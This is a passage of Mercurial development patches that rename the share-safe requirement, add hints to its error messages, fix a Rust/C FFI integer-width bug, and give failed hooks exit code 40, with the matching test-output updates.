``safe-mismatch.source-not-safe.warn`` Shows a warning on operations if the shared repository uses share-safe, diff --git a/mercurial/helptext/hg.1.txt b/mercurial/helptext/hg.1.txt --- a/mercurial/helptext/hg.1.txt +++ b/mercurial/helptext/hg.1.txt @@ -112,7 +112,7 @@ Copying """"""" -Copyright (C) 2005-2020 Matt Mackall. +Copyright (C) 2005-2021 Matt Mackall. Free use of this software is granted under the terms of the GNU General Public License version 2 or any later version. diff --git a/mercurial/helptext/hgignore.5.txt b/mercurial/helptext/hgignore.5.txt --- a/mercurial/helptext/hgignore.5.txt +++ b/mercurial/helptext/hgignore.5.txt @@ -26,7 +26,7 @@ Copying ======= This manual page is copyright 2006 Vadim Gelfer. -Mercurial is copyright 2005-2020 Matt Mackall. +Mercurial is copyright 2005-2021 Matt Mackall. Free use of this software is granted under the terms of the GNU General Public License version 2 or any later version. diff --git a/mercurial/helptext/hgrc.5.txt b/mercurial/helptext/hgrc.5.txt --- a/mercurial/helptext/hgrc.5.txt +++ b/mercurial/helptext/hgrc.5.txt @@ -34,7 +34,7 @@ Copying ======= This manual page is copyright 2005 Bryan O'Sullivan. -Mercurial is copyright 2005-2020 Matt Mackall. +Mercurial is copyright 2005-2021 Matt Mackall. Free use of this software is granted under the terms of the GNU General Public License version 2 or any later version. diff --git a/mercurial/helptext/internals/requirements.txt b/mercurial/helptext/internals/requirements.txt --- a/mercurial/helptext/internals/requirements.txt +++ b/mercurial/helptext/internals/requirements.txt @@ -131,7 +131,7 @@ directory. bookmarksinstore -================== +================ Bookmarks are stored in ``.hg/store/`` instead of directly in ``.hg/`` where they used to be stored. The active bookmark is still stored @@ -156,8 +156,8 @@ benefit from a speedup. The other installations will do the necessary work to keep the index up to date, but will suffer a slowdown. -exp-sharesafe -============= +share-safe +========== Represents that the repository can be shared safely. Requirements and config of the source repository will be shared. diff --git a/mercurial/localrepo.py b/mercurial/localrepo.py --- a/mercurial/localrepo.py +++ b/mercurial/localrepo.py @@ -568,6 +568,7 @@ # repository was shared the old way. We check the share source .hg/requires # for SHARESAFE_REQUIREMENT to detect whether the current repository needs # to be reshared + hint = _("see `hg help config.format.use-share-safe` for more information") if requirementsmod.SHARESAFE_REQUIREMENT in requirements: if ( @@ -599,14 +600,10 @@ ) elif mismatch_config == b'abort': raise error.Abort( - _( - b"share source does not support exp-sharesafe requirement" - ) + _(b"share source does not support share-safe requirement"), + hint=hint, ) else: - hint = _( - "run `hg help config.share.safe-mismatch.source-not-safe`" - ) raise error.Abort( _( b"share-safe mismatch with source.\nUnrecognized" @@ -646,10 +643,10 @@ _( b'version mismatch: source uses share-safe' b' functionality while the current share does not' - ) + ), + hint=hint, ) else: - hint = _("run `hg help config.share.safe-mismatch.source-safe`") raise error.Abort( _( b"share-safe mismatch with source.\nUnrecognized" diff --git a/mercurial/upgrade.py b/mercurial/upgrade.py --- a/mercurial/upgrade.py +++ b/mercurial/upgrade.py @@ -277,15 +277,20 @@ scmutil.writerequires(hgvfs, diffrequires) ui.warn(_(b'repository upgraded to use share-safe mode\n')) except error.LockError as e: + hint = _( + "see `hg help config.format.use-share-safe` for more information" + ) if mismatch_config == b'upgrade-abort': raise error.Abort( _(b'failed to upgrade share, got error: %s') - % stringutil.forcebytestr(e.strerror) + % stringutil.forcebytestr(e.strerror), + hint=hint, ) elif mismatch_warn: ui.warn( _(b'failed to upgrade share, got error: %s\n') - % stringutil.forcebytestr(e.strerror) + % stringutil.forcebytestr(e.strerror), + hint=hint, ) finally: if wlock: @@ -329,17 +334,22 @@ scmutil.writerequires(hgvfs, current_requirements) ui.warn(_(b'repository downgraded to not use share-safe mode\n')) except error.LockError as e: + hint = _( + "see `hg help config.format.use-share-safe` for more information" + ) # If upgrade-abort is set, abort when upgrade fails, else let the # process continue as `upgrade-allow` is set if mismatch_config == b'downgrade-abort': raise error.Abort( _(b'failed to downgrade share, got error: %s') - % stringutil.forcebytestr(e.strerror) + % stringutil.forcebytestr(e.strerror), + hint=hint, ) elif mismatch_warn: ui.warn( _(b'failed to downgrade share, got error: %s\n') - % stringutil.forcebytestr(e.strerror) + % stringutil.forcebytestr(e.strerror), + hint=hint, ) finally: if wlock: diff --git a/rust/hg-cpython/src/cindex.rs b/rust/hg-cpython/src/cindex.rs --- a/rust/hg-cpython/src/cindex.rs +++ b/rust/hg-cpython/src/cindex.rs @@ -16,7 +16,7 @@ }; use hg::revlog::{Node, RevlogIndex}; use hg::{Graph, GraphError, Revision, WORKING_DIRECTORY_REVISION}; -use libc::c_int; +use libc::{c_int, ssize_t}; const REVLOG_CABI_VERSION: c_int = 2; @@ -24,10 +24,10 @@ pub struct Revlog_CAPI { abi_version: c_int, index_length: - unsafe extern "C" fn(index: *mut revlog_capi::RawPyObject) -> c_int, + unsafe extern "C" fn(index: *mut revlog_capi::RawPyObject) -> ssize_t, index_node: unsafe extern "C" fn( index: *mut revlog_capi::RawPyObject, - rev: c_int, + rev: ssize_t, ) -> *const Node, index_parents: unsafe extern "C" fn( index: *mut revlog_capi::RawPyObject, @@ -157,7 +157,7 @@ fn node(&self, rev: Revision) -> Option<&Node> { let raw = unsafe { - (self.capi.index_node)(self.index.as_ptr(), rev as c_int) + (self.capi.index_node)(self.index.as_ptr(), rev as ssize_t) }; if raw.is_null() { None diff --git a/setup.py b/setup.py --- a/setup.py +++ b/setup.py @@ -1700,6 +1700,8 @@ 'mercurial.pure', ] +py2exe_includes = [] + py2exeexcludes = [] py2exedllexcludes = ['crypt32.dll'] @@ -1710,7 +1712,7 @@ extra['console'] = [ { 'script': 'hg', - 'copyright': 'Copyright (C) 2005-2020 Matt Mackall and others', + 'copyright': 'Copyright (C) 2005-2021 Matt Mackall and others', 'product_version': version, } ] @@ -1728,6 +1730,10 @@ if extrapackages: py2exepackages.extend(extrapackages.split(' ')) + extra_includes = os.environ.get('HG_PY2EXE_EXTRA_INCLUDES') + if extra_includes: + py2exe_includes.extend(extra_includes.split(' ')) + excludes = os.environ.get('HG_PY2EXE_EXTRA_EXCLUDES') if excludes: py2exeexcludes.extend(excludes.split(' ')) @@ -1827,6 +1833,7 @@ 'py2exe': { 'bundle_files': 3, 'dll_excludes': py2exedllexcludes, + 'includes': py2exe_includes, 'excludes': py2exeexcludes, 'packages': py2exepackages, }, diff --git a/tests/test-lfs-test-server.t b/tests/test-lfs-test-server.t --- a/tests/test-lfs-test-server.t +++ b/tests/test-lfs-test-server.t @@ -420,7 +420,10 @@ TODO: give the proper error indication from `hg serve` - $ hg --repo ../repo1 update -C tip --debug +TODO: reconsider the except base class so that the git and hg errors yield the +same exit status. + + $ hg --repo ../repo1 update -C tip --debug --config ui.detailed-exit-code=False http auth: user foo, password *** resolving manifests branchmerge: False, force: True, partial: False @@ -460,7 +463,7 @@ Date: $HTTP_DATE$ (git-server !) abort: corrupt remote lfs object: d11e1a642b60813aee592094109b406089b8dff4cb157157f753418ec7857998 (git-server !) abort: LFS server error for "c": Validation error (hg-server !) - [50] + [255] The corrupted blob is not added to the usercache or local store diff --git a/tests/test-persistent-nodemap.t b/tests/test-persistent-nodemap.t --- a/tests/test-persistent-nodemap.t +++ b/tests/test-persistent-nodemap.t @@ -31,6 +31,23 @@ #endif +#if rust + +Regression test for a previous bug in Rust/C FFI for the `Revlog_CAPI` capsule: +in places where `mercurial/cext/revlog.c` function signatures use `Py_ssize_t` +(64 bits on Linux x86_64), corresponding declarations in `rust/hg-cpython/src/cindex.rs` +incorrectly used `libc::c_int` (32 bits). +As a result, -1 passed from Rust for the null revision became 4294967295 in C. + + $ hg log -r 00000000 + changeset: -1:000000000000 + tag: tip + user: + date: Thu Jan 01 00:00:00 1970 +0000 + + +#endif + $ hg debugformat format-variant repo diff --git a/tests/test-share-safe.t b/tests/test-share-safe.t --- a/tests/test-share-safe.t +++ b/tests/test-share-safe.t @@ -405,6 +405,7 @@ $ hg log -GT "{node}: {desc}\n" -R ../nss-share abort: version mismatch: source uses share-safe functionality while the current share does not + (see `hg help config.format.use-share-safe` for more information) [255] @@ -495,7 +496,8 @@ $ hg log -GT "{node}: {desc}\n" -R ../ss-share - abort: share source does not support exp-sharesafe requirement + abort: share source does not support share-safe requirement + (see `hg help config.format.use-share-safe` for more information) [255] Testing automatic downgrade of shares when config is set @@ -503,6 +505,7 @@ $ touch ../ss-share/.hg/wlock $ hg log -GT "{node}: {desc}\n" -R ../ss-share --config share.safe-mismatch.source-not-safe=downgrade-abort abort: failed to downgrade share, got error: Lock held + (see `hg help config.format.use-share-safe` for more information) [255] $ rm ../ss-share/.hg/wlock @@ -545,13 +548,14 @@ store $ hg log -GT "{node}: {desc}\n" -R ../nss-share abort: version mismatch: source uses share-safe functionality while the current share does not + (see `hg help config.format.use-share-safe` for more information) [255] Check that if lock is taken, upgrade fails but read operation are successful $ hg log -GT "{node}: {desc}\n" -R ../nss-share --config share.safe-mismatch.source-safe=upgra abort: share-safe mismatch with source. Unrecognized value 'upgra' of `share.safe-mismatch.source-safe` set. - (run `hg help config.share.safe-mismatch.source-safe`) + (see `hg help config.format.use-share-safe` for more information) [255] $ touch ../nss-share/.hg/wlock $ hg log -GT "{node}: {desc}\n" -R ../nss-share --config share.safe-mismatch.source-safe=upgrade-allow @@ -569,6 +573,7 @@ $ hg log -GT "{node}: {desc}\n" -R ../nss-share --config share.safe-mismatch.source-safe=upgrade-abort abort: failed to upgrade share, got error: Lock held + (see `hg help config.format.use-share-safe` for more information) [255] $ rm ../nss-share/.hg/wlock diff --git a/tests/test-wireproto-exchangev2-shallow.t b/tests/test-wireproto-exchangev2-shallow.t --- a/tests/test-wireproto-exchangev2-shallow.t +++ b/tests/test-wireproto-exchangev2-shallow.t @@ -100,10 +100,15 @@ received frame(size=1170; request=1; stream=2; streamflags=encoded; type=command-response; flags=continuation) received frame(size=0; request=1; stream=2; streamflags=; type=command-response; flags=eos) (?) add changeset 3390ef850073 + received frame(size=0; request=1; stream=2; streamflags=; type=command-response; flags=eos) (?) add changeset b709380892b1 + received frame(size=0; request=1; stream=2; streamflags=; type=command-response; flags=eos) (?) add changeset 47fe012ab237 + received frame(size=0; request=1; stream=2; streamflags=; type=command-response; flags=eos) (?) add changeset 97765fc3cd62 + received frame(size=0; request=1; stream=2; streamflags=; type=command-response; flags=eos) (?) add changeset dc666cf9ecf3 + received frame(size=0; request=1; stream=2; streamflags=; type=command-response; flags=eos) (?) add changeset 93a8bd067ed2 received frame(size=0; request=1; stream=2; streamflags=; type=command-response; flags=eos) (?) checking for updated bookmarks @@ -269,10 +274,15 @@ received frame(size=1170; request=1; stream=2; streamflags=encoded; type=command-response; flags=continuation) received frame(size=0; request=1; stream=2; streamflags=; type=command-response; flags=eos) (?) add changeset 3390ef850073 + received frame(size=0; request=1; stream=2; streamflags=; type=command-response; flags=eos) (?) add changeset b709380892b1 + received frame(size=0; request=1; stream=2; streamflags=; type=command-response; flags=eos) (?) add changeset 47fe012ab237 + received frame(size=0; request=1; stream=2; streamflags=; type=command-response; flags=eos) (?) add changeset 97765fc3cd62 + received frame(size=0; request=1; stream=2; streamflags=; type=command-response; flags=eos) (?) add changeset dc666cf9ecf3 + received frame(size=0; request=1; stream=2; streamflags=; type=command-response; flags=eos) (?) add changeset 93a8bd067ed2 received frame(size=0; request=1; stream=2; streamflags=; type=command-response; flags=eos) (?) checking for updated bookmarks @@ -407,8 +417,11 @@ received frame(size=783; request=1; stream=2; streamflags=encoded; type=command-response; flags=continuation) received frame(size=0; request=1; stream=2; streamflags=; type=command-response; flags=eos) (?) add changeset 3390ef850073 + received frame(size=0; request=1; stream=2; streamflags=; type=command-response; flags=eos) (?) add changeset b709380892b1 + received frame(size=0; request=1; stream=2; streamflags=; type=command-response; flags=eos) (?) add changeset 47fe012ab237 + received frame(size=0; request=1; stream=2; streamflags=; type=command-response; flags=eos) (?) add changeset 97765fc3cd62 received frame(size=0; request=1; stream=2; streamflags=; type=command-response; flags=eos) (?) checking for updated bookmarks @@ -522,6 +535,7 @@ received frame(size=400; request=1; stream=2; streamflags=encoded; type=command-response; flags=continuation) received frame(size=0; request=1; stream=2; streamflags=; type=command-response; flags=eos) (?) add changeset dc666cf9ecf3 + received frame(size=0; request=1; stream=2; streamflags=; type=command-response; flags=eos) (?) add changeset 93a8bd067ed2 received frame(size=0; request=1; stream=2; streamflags=; type=command-response; flags=eos) (?) checking for updated bookmarks # HG changeset patch # User Augie Fackler <augie@google.com> # Date 1611942610 18000 # Fri Jan 29 12:50:10 2021 -0500 # Node ID bc3f3b59d0a444fe6e6e2f510c879c30a701fc27 # Parent 16c18d5e5dc88810d3410d9370cb851f508ffbf5 context: add missing manifest invalidation after write in overlayworkingctx This was breaking my merge-diff logic that will be in the next patch. Differential Revision: https://phab.mercurial-scm.org/D9908 diff --git a/mercurial/context.py b/mercurial/context.py --- a/mercurial/context.py +++ b/mercurial/context.py @@ -2597,6 +2597,7 @@ b'flags': flags, b'copied': copied, } + util.clearcachedproperty(self, b'_manifest') def filectx(self, path, filelog=None): return overlayworkingfilectx( # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1611951415 28800 # Fri Jan 29 12:16:55 2021 -0800 # Node ID 7680565497374b00e832a1917065b9afec6b9f25 # Parent bc3f3b59d0a444fe6e6e2f510c879c30a701fc27 errors: use exit code 40 for when a hook fails A hook can be used for checking inputs, state, configuration, security, etc., so it's unclear which of the existing exit codes to use. Let's instead add one specifically for failed hooks. I picked 40. Differential Revision: https://phab.mercurial-scm.org/D9910 diff --git a/mercurial/scmutil.py b/mercurial/scmutil.py --- a/mercurial/scmutil.py +++ b/mercurial/scmutil.py @@ -229,6 +229,8 @@ detailed_exit_code = 20 elif isinstance(inst, error.ConfigError): detailed_exit_code = 30 + elif isinstance(inst, error.HookAbort): + detailed_exit_code = 40 elif isinstance(inst, error.SecurityError): detailed_exit_code = 150 elif isinstance(inst, error.CanceledError): diff --git a/tests/test-bookmarks-pushpull.t b/tests/test-bookmarks-pushpull.t --- a/tests/test-bookmarks-pushpull.t +++ b/tests/test-bookmarks-pushpull.t @@ -1177,7 +1177,7 @@ searching for changes no changes found abort: prepushkey hook exited with status 1 - [255] + [40] #endif diff --git a/tests/test-bookmarks.t b/tests/test-bookmarks.t --- a/tests/test-bookmarks.t +++ b/tests/test-bookmarks.t @@ -1125,7 +1125,7 @@ transaction abort! rollback completed abort: pretxnclose hook exited with status 1 - [255] + [40] $ cp .hg/bookmarks.pending.saved .hg/bookmarks.pending (check visible bookmarks while transaction running in repo) @@ -1158,7 +1158,7 @@ transaction abort! rollback completed abort: pretxnclose hook exited with status 1 - [255] + [40] Check pretxnclose-bookmark can abort a transaction -------------------------------------------------- @@ -1242,7 +1242,7 @@ transaction abort! rollback completed abort: pretxnclose-bookmark.force-public hook exited with status 1 - [255] + [40] create on a public changeset @@ -1254,4 +1254,4 @@ transaction abort! rollback completed abort: pretxnclose-bookmark.force-forward hook exited with status 1 - [255] + [40] diff --git a/tests/test-bundle2-exchange.t b/tests/test-bundle2-exchange.t --- a/tests/test-bundle2-exchange.t +++ b/tests/test-bundle2-exchange.t @@ -638,7 +638,7 @@ remote: Cleaning up the mess... remote: rollback completed abort: pretxnclose.failpush hook exited with status 1 - [255] + [40] $ hg -R main push ssh://user@dummy/other -r e7ec4e813ba6 pushing to ssh://user@dummy/other @@ -699,7 +699,7 @@ remote: Cleaning up the mess... remote: rollback completed abort: pretxnchangegroup hook exited with status 1 - [255] + [40] $ hg -R main push ssh://user@dummy/other -r e7ec4e813ba6 pushing to ssh://user@dummy/other searching for changes @@ -747,7 +747,7 @@ Cleaning up the mess... rollback completed abort: pretxnchangegroup hook exited with status 1 - [255] + [40] $ hg -R main push ssh://user@dummy/other -r e7ec4e813ba6 pushing to ssh://user@dummy/other searching for changes diff --git a/tests/test-commandserver.t b/tests/test-commandserver.t --- a/tests/test-commandserver.t +++ b/tests/test-commandserver.t @@ -522,7 +522,7 @@ transaction abort! rollback completed abort: pretxncommit hook exited with status 1 - [255] + [40] *** runcommand verify checking changesets checking manifests @@ -1013,7 +1013,7 @@ transaction abort! rollback completed abort: pretxncommit hook exited with status 1 - [255] + [40] *** runcommand log *** runcommand verify -q @@ -1057,7 +1057,7 @@ transaction abort! rollback completed abort: pretxncommit hook exited with status 1 - [255] + [40] *** runcommand log 0 bar (bar) *** runcommand verify -q diff --git a/tests/test-commit-amend.t b/tests/test-commit-amend.t --- a/tests/test-commit-amend.t +++ b/tests/test-commit-amend.t @@ -209,7 +209,7 @@ transaction abort! rollback completed abort: pretxncommit.test-saving-last-message hook exited with status 1 - [255] + [40] $ cat .hg/last-message.txt message given from command line (no-eol) @@ -234,7 +234,7 @@ transaction abort! rollback completed abort: pretxncommit.test-saving-last-message hook exited with status 1 - [255] + [40] $ cat .hg/last-message.txt another precious commit message diff --git a/tests/test-dispatch.t b/tests/test-dispatch.t --- a/tests/test-dispatch.t +++ b/tests/test-dispatch.t @@ -154,7 +154,7 @@ $ HGPLAIN=+strictflags hg --config='hooks.pre-log=false' log -b default abort: pre-log hook exited with status 1 - [255] + [40] $ HGPLAIN=+strictflags hg --cwd .. -q -Ra log -b default 0:cb9a9f314b8b $ HGPLAIN=+strictflags hg --cwd .. -q --repository a log -b default @@ -166,7 +166,7 @@ $ HGPLAIN= hg log --config='hooks.pre-log=false' -b default abort: pre-log hook exited with status 1 - [255] + [40] $ HGPLAINEXCEPT= hg log --cwd .. -q -Ra -b default 0:cb9a9f314b8b diff --git a/tests/test-histedit-edit.t b/tests/test-histedit-edit.t --- a/tests/test-histedit-edit.t +++ b/tests/test-histedit-edit.t @@ -375,7 +375,7 @@ note: commit message saved in .hg/last-message.txt note: use 'hg commit --logfile .hg/last-message.txt --edit' to reuse it abort: pretxncommit.unexpectedabort hook exited with status 1 - [255] + [40] $ cat .hg/last-message.txt f @@ -400,7 +400,7 @@ note: commit message saved in .hg/last-message.txt note: use 'hg commit --logfile .hg/last-message.txt --edit' to reuse it abort: pretxncommit.unexpectedabort hook exited with status 1 - [255] + [40] $ cat >> .hg/hgrc <<EOF > [hooks] diff --git a/tests/test-histedit-fold.t b/tests/test-histedit-fold.t --- a/tests/test-histedit-fold.t +++ b/tests/test-histedit-fold.t @@ -202,7 +202,7 @@ transaction abort! rollback completed abort: pretxncommit.abortfolding hook failed - [255] + [40] $ cat .hg/last-message.txt f diff --git a/tests/test-hook.t b/tests/test-hook.t --- a/tests/test-hook.t +++ b/tests/test-hook.t @@ -227,7 +227,7 @@ HG_PATS=[] abort: pre-identify hook exited with status 1 - [255] + [40] $ hg cat b pre-cat hook: HG_ARGS=cat b HG_HOOKNAME=pre-cat @@ -390,7 +390,7 @@ HG_TAG=fa abort: pretag.forbid hook exited with status 1 - [255] + [40] $ hg tag -l fla pretag hook: HG_HOOKNAME=pretag HG_HOOKTYPE=pretag @@ -405,7 +405,7 @@ HG_TAG=fla abort: pretag.forbid hook exited with status 1 - [255] + [40] pretxncommit hook can see changeset, can roll back txn, changeset no more there after @@ -451,7 +451,7 @@ rollback completed abort: pretxncommit.forbid1 hook exited with status 1 - [255] + [40] $ hg -q tip 4:539e4b31b6dc @@ -485,7 +485,7 @@ HG_PARENT1=539e4b31b6dc99b3cfbaa6b53cbc1c1f9a1e3a10 abort: precommit.forbid hook exited with status 1 - [255] + [40] $ hg -q tip 4:539e4b31b6dc @@ -644,7 +644,7 @@ HG_URL=file:$TESTTMP/a abort: prepushkey hook exited with status 1 - [255] + [40] $ cd ../a test that prelistkeys can prevent listing keys @@ -679,7 +679,7 @@ HG_NAMESPACE=bookmarks abort: prelistkeys hook exited with status 1 - [255] + [40] $ cd ../a $ rm .hg/hgrc @@ -704,7 +704,7 @@ HG_URL=file:$TESTTMP/a abort: prechangegroup.forbid hook exited with status 1 - [255] + [40] pretxnchangegroup hook can see incoming changes, can roll back txn, incoming changes no longer there after @@ -735,7 +735,7 @@ transaction abort! rollback completed abort: pretxnchangegroup.forbid1 hook exited with status 1 - [255] + [40] $ hg -q tip 3:07f3376c1e65 @@ -786,7 +786,7 @@ HG_SOURCE=pull abort: preoutgoing.forbid hook exited with status 1 - [255] + [40] outgoing hooks work for local clones @@ -825,7 +825,7 @@ HG_SOURCE=clone abort: preoutgoing.forbid hook exited with status 1 - [255] + [40] $ cd "$TESTTMP/b" @@ -915,7 +915,7 @@ hooktype preoutgoing source pull abort: preoutgoing.fail hook failed - [255] + [40] $ echo '[hooks]' > ../a/.hg/hgrc $ echo 'preoutgoing.uncallable = python:hooktests.uncallable' >> ../a/.hg/hgrc @@ -1283,7 +1283,7 @@ rollback completed strip failed, backup bundle stored in * (glob) abort: pretxnclose.error hook exited with status 1 - [255] + [40] $ hg recover no interrupted transaction available [1] @@ -1306,7 +1306,7 @@ transaction abort! rollback completed abort: pretxnclose hook exited with status 1 - [255] + [40] $ cp .hg/store/00changelog.i.a.saved .hg/store/00changelog.i.a (check (in)visibility of new changeset while transaction running in @@ -1331,7 +1331,7 @@ transaction abort! rollback completed abort: pretxnclose hook exited with status 1 - [255] + [40] Hook from untrusted hgrc are reported as failure ================================================ @@ -1382,7 +1382,7 @@ rollback completed abort: untrusted hook pretxnclose.testing not executed (see 'hg help config.trusted') - [255] + [40] $ hg log changeset: 0:3903775176ed tag: tip diff --git a/tests/test-mactext.t b/tests/test-mactext.t --- a/tests/test-mactext.t +++ b/tests/test-mactext.t @@ -27,7 +27,7 @@ transaction abort! rollback completed abort: pretxncommit.cr hook failed - [255] + [40] $ hg cat f | f --hexdump 0000: 68 65 6c 6c 6f 0a |hello.| diff --git a/tests/test-merge-tools.t b/tests/test-merge-tools.t --- a/tests/test-merge-tools.t +++ b/tests/test-merge-tools.t @@ -377,7 +377,7 @@ merging f some fail message abort: $TESTTMP/mybrokenmerge.py hook failed - [255] + [40] $ aftermerge # cat f revision 1 diff --git a/tests/test-mq-qfold.t b/tests/test-mq-qfold.t --- a/tests/test-mq-qfold.t +++ b/tests/test-mq-qfold.t @@ -235,7 +235,7 @@ rollback completed qrefresh interrupted while patch was popped! (revert --all, qpush to recover) abort: pretxncommit.unexpectedabort hook exited with status 1 - [255] + [40] $ cat .hg/last-message.txt original message diff --git a/tests/test-mq-qnew.t b/tests/test-mq-qnew.t --- a/tests/test-mq-qnew.t +++ b/tests/test-mq-qnew.t @@ -310,7 +310,7 @@ note: commit message saved in .hg/last-message.txt note: use 'hg commit --logfile .hg/last-message.txt --edit' to reuse it abort: pretxncommit.unexpectedabort hook exited with status 1 - [255] + [40] $ cat .hg/last-message.txt diff --git a/tests/test-mq-qrefresh-replace-log-message.t b/tests/test-mq-qrefresh-replace-log-message.t --- a/tests/test-mq-qrefresh-replace-log-message.t +++ b/tests/test-mq-qrefresh-replace-log-message.t @@ -191,7 +191,7 @@ rollback completed qrefresh interrupted while patch was popped! (revert --all, qpush to recover) abort: pretxncommit.unexpectedabort hook exited with status 1 - [255] + [40] $ cat .hg/last-message.txt Fifth commit message This is the 5th log message @@ -235,7 +235,7 @@ rollback completed qrefresh interrupted while patch was popped! (revert --all, qpush to recover) abort: pretxncommit.unexpectedabort hook exited with status 1 - [255] + [40] (rebuilding at failure of qrefresh bases on rev #0, and it causes dropping status of "file2") @@ -273,7 +273,7 @@ rollback completed qrefresh interrupted while patch was popped! (revert --all, qpush to recover) abort: pretxncommit.unexpectedabort hook exited with status 1 - [255] + [40] $ sh "$TESTTMP/checkvisibility.sh" ==== @@ -315,7 +315,7 @@ rollback completed qrefresh interrupted while patch was popped! (revert --all, qpush to recover) abort: pretxncommit.unexpectedabort hook exited with status 1 - [255] + [40] $ sh "$TESTTMP/checkvisibility.sh" ==== diff --git a/tests/test-narrow-pull.t b/tests/test-narrow-pull.t --- a/tests/test-narrow-pull.t +++ b/tests/test-narrow-pull.t @@ -78,7 +78,7 @@ transaction abort! rollback completed abort: pretxnchangegroup.bad hook exited with status 1 - [255] + [40] $ hg id 223311e70a6f tip diff --git a/tests/test-narrow-widen.t b/tests/test-narrow-widen.t --- a/tests/test-narrow-widen.t +++ b/tests/test-narrow-widen.t @@ -431,7 +431,7 @@ transaction abort! rollback completed abort: pretxnchangegroup.bad hook exited with status 1 - [255] + [40] $ hg l $ hg bookmarks no bookmarks set diff --git a/tests/test-phases.t b/tests/test-phases.t --- a/tests/test-phases.t +++ b/tests/test-phases.t @@ -757,7 +757,7 @@ transaction abort! rollback completed abort: pretxnclose hook exited with status 1 - [255] + [40] $ cp .hg/store/phaseroots.pending.saved .hg/store/phaseroots.pending (check (in)visibility of phaseroot while transaction running in repo) @@ -780,7 +780,7 @@ transaction abort! rollback completed abort: pretxnclose hook exited with status 1 - [255] + [40] Check that pretxnclose-phase hook can control phase movement @@ -854,12 +854,12 @@ transaction abort! rollback completed abort: pretxnclose-phase.nopublish_D hook exited with status 1 - [255] + [40] $ hg phase --public a603bfb5a83e transaction abort! rollback completed abort: pretxnclose-phase.nopublish_D hook exited with status 1 - [255] + [40] $ hg phase --draft 17a481b3bccb test-debug-phase: move rev 3: 2 -> 1 test-debug-phase: move rev 4: 2 -> 1 @@ -871,7 +871,7 @@ transaction abort! rollback completed abort: pretxnclose-phase.nopublish_D hook exited with status 1 - [255] + [40] $ cd .. diff --git a/tests/test-rebase-interruptions.t b/tests/test-rebase-interruptions.t --- a/tests/test-rebase-interruptions.t +++ b/tests/test-rebase-interruptions.t @@ -350,7 +350,7 @@ M A rebasing 6:a0b2430ebfb8 tip "F" abort: precommit hook exited with status 1 - [255] + [40] $ hg tglogp @ 7: 401ccec5e39f secret 'C' | @@ -401,7 +401,7 @@ transaction abort! rollback completed abort: pretxncommit hook exited with status 1 - [255] + [40] $ hg tglogp @ 7: 401ccec5e39f secret 'C' | @@ -451,7 +451,7 @@ transaction abort! rollback completed abort: pretxnclose hook exited with status 1 - [255] + [40] $ hg tglogp @ 7: 401ccec5e39f secret 'C' | diff --git a/tests/test-rollback.t b/tests/test-rollback.t --- a/tests/test-rollback.t +++ b/tests/test-rollback.t @@ -103,7 +103,7 @@ transaction abort! rollback completed abort: pretxncommit hook exited with status * (glob) - [255] + [40] $ cat .hg/last-message.txt ; echo precious commit message @@ -118,7 +118,7 @@ note: commit message saved in .hg/last-message.txt note: use 'hg commit --logfile .hg/last-message.txt --edit' to reuse it abort: pretxncommit hook exited with status * (glob) - [255] + [40] $ cat .hg/last-message.txt another precious commit message @@ -380,7 +380,7 @@ warn during abort rollback completed abort: pretxncommit hook exited with status 1 - [255] + [40] $ hg commit -m 'commit 1' warn during pretxncommit @@ -405,7 +405,7 @@ transaction abort! rollback completed abort: pretxncommit hook exited with status 1 - [255] + [40] $ hg commit -m 'commit 1' warn during pretxncommit @@ -431,7 +431,7 @@ transaction abort! warn during abort abort: pretxncommit hook exited with status 1 - [255] + [40] $ hg verify checking changesets diff --git a/tests/test-share-bookmarks.t b/tests/test-share-bookmarks.t --- a/tests/test-share-bookmarks.t +++ b/tests/test-share-bookmarks.t @@ -102,7 +102,7 @@ transaction abort! rollback completed abort: pretxnclose hook exited with status 1 - [255] + [40] $ hg book bm1 FYI, in contrast to above test, bmX is invisible in repo1 (= shared @@ -127,7 +127,7 @@ transaction abort! rollback completed abort: pretxnclose hook exited with status 1 - [255] + [40] $ hg book bm3 clean up bm2 since it's uninteresting (not shared in the vfs case and @@ -249,7 +249,7 @@ no changes found adding remote bookmark bm3 abort: forced failure by extension - [255] + [40] $ hg boo bm1 3:b87954705719 bm4 5:92793bfc8cad diff --git a/tests/test-strip.t b/tests/test-strip.t --- a/tests/test-strip.t +++ b/tests/test-strip.t @@ -427,7 +427,7 @@ strip failed, unrecovered changes stored in '$TESTTMP/test/.hg/strip-backup/*-temp.hg' (glob) (fix the problem, then recover the changesets with "hg unbundle '$TESTTMP/test/.hg/strip-backup/*-temp.hg'") (glob) abort: pretxnchangegroup.bad hook exited with status 1 - [255] + [40] $ restore $ hg log -G o changeset: 4:443431ffac4f diff --git a/tests/test-tag.t b/tests/test-tag.t --- a/tests/test-tag.t +++ b/tests/test-tag.t @@ -290,7 +290,7 @@ $ rm -f .hg/last-message.txt $ HGEDITOR="\"sh\" \"`pwd`/editor.sh\"" hg tag custom-tag -e abort: pretag.test-saving-lastmessage hook exited with status 1 - [255] + [40] $ test -f .hg/last-message.txt [1] @@ -325,7 +325,7 @@ note: commit message saved in .hg/last-message.txt note: use 'hg commit --logfile .hg/last-message.txt --edit' to reuse it abort: pretxncommit.unexpectedabort hook exited with status 1 - [255] + [40] $ cat .hg/last-message.txt custom tag message second line diff --git a/tests/test-transplant.t b/tests/test-transplant.t --- a/tests/test-transplant.t +++ b/tests/test-transplant.t @@ -1091,7 +1091,7 @@ transaction abort! rollback completed abort: pretxncommit.abort hook exited with status 1 - [255] + [40] $ cat >> .hg/hgrc <<EOF > [hooks] > pretxncommit.abort = ! diff --git a/tests/test-win32text.t b/tests/test-win32text.t --- a/tests/test-win32text.t +++ b/tests/test-win32text.t @@ -38,7 +38,7 @@ transaction abort! rollback completed abort: pretxncommit.crlf hook failed - [255] + [40] $ mv .hg/hgrc .hg/hgrc.bak @@ -77,7 +77,7 @@ transaction abort! rollback completed abort: pretxnchangegroup.crlf hook failed - [255] + [40] $ mv .hg/hgrc.bak .hg/hgrc $ echo hello > f @@ -109,7 +109,7 @@ transaction abort! rollback completed abort: pretxncommit.crlf hook failed - [255] + [40] $ hg revert -a forgetting d/f2 $ rm d/f2 @@ -286,7 +286,7 @@ transaction abort! rollback completed abort: pretxnchangegroup.crlf hook failed - [255] + [40] $ hg log -v changeset: 5:f0b1c8d75fce # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1611964568 28800 # Fri Jan 29 15:56:08 2021 -0800 # Node ID dc00324e80f41ec5f5a7c4dc36b5c7af2390fda5 # Parent 